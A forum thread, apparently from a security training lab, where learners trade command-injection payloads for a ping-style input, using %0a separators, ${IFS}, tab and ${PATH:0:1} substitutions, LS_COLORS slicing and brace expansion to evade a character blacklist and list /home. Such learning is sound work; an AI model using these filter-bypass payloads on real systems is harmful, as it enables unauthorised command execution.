Command Injections - Bypassing Other Blacklisted Characters

Hey. I’ve been stuck with this question. " Use what you learned in this section to find name of the user in the ‘/home’ folder. What user did you find?"

I’ve tried some payloads like
127.0.0.1${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},$(tr ‘!-}’ ‘"-~’<<<.gnld)},
127.0.0.1${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},${PATH:0:5},
etc
but none of them works. It just returns something like this


Can someone give me a hint how to solve the question?

I updated my payload to 127.0.0.1${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:5}
127.0.0.1${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}
But this is what I get so far. I need help.

I know that you’re supposed to use the $PATH variable because it makes the /. I’m stuck here also.
I used ip=127.0.0.1${LS_COLORS}${IFS}${PATH:0:1}${HOME}. It translates to ip=127.0.0.1; /HOME but its not working for me. I feel like something is missing. What does yours translate too?

Hi, I finally figured it out!
No need to use ${} for letters in the command.
Use it only for slashes and ;.
For spaces use the “space bypass tecnique” on the previous sections

2 Likes

hey could you give a nudge for the final part of the syntax, i got the directory to print in the response but i cannot get whoami to work

Hi, assuming that you have found the correct request and parameter to inject, follow the indications I posted earlier.
For the command itself, take a look to <<< and subshell syntax like &{}, and don’t forget encoding.

1 Like

Hello everyone, Can anyone help me with this one?
I stuck also.
I used multiple scenarios but no luck:
127.0.0.1%0a{IFS}{ls,-la}${IFS}${PATH:0:1}Home

127.0.0.1%0a{IFS}{ls,-la}${IFS}${HOME:0:5}
127.0.0.1 ${LS_COLORS:10:1}${IFS}${PATH:0:1}home

I am not getting invalid input in the responses for the above, but no luck finding the username so i believe to be in the right path of solving it.
Can anyone give me a tip to solve it?

This one was annoying because it depends on you guessing 2 parts of the command correctly to get any results. For example, why would you intuit that the server would accept plaintext following the command to break the logic, especially when the segment you’re in details how to get arbitrary characters from bit shifting. Here’s a clue for those who are stuck: ip=127.0.0.1%0a${IFS}ls%09${PATH:0:1}home

2 Likes

use can use something like this
ip=127.0.0.1%0a{l*,-**,${****:0:1}home}

3 Likes

Thank you sir!

John

Thank you!

Thanks.

Worked.
127.0.0.1%0a{ls,-**}${**S}${PATH:1:0}home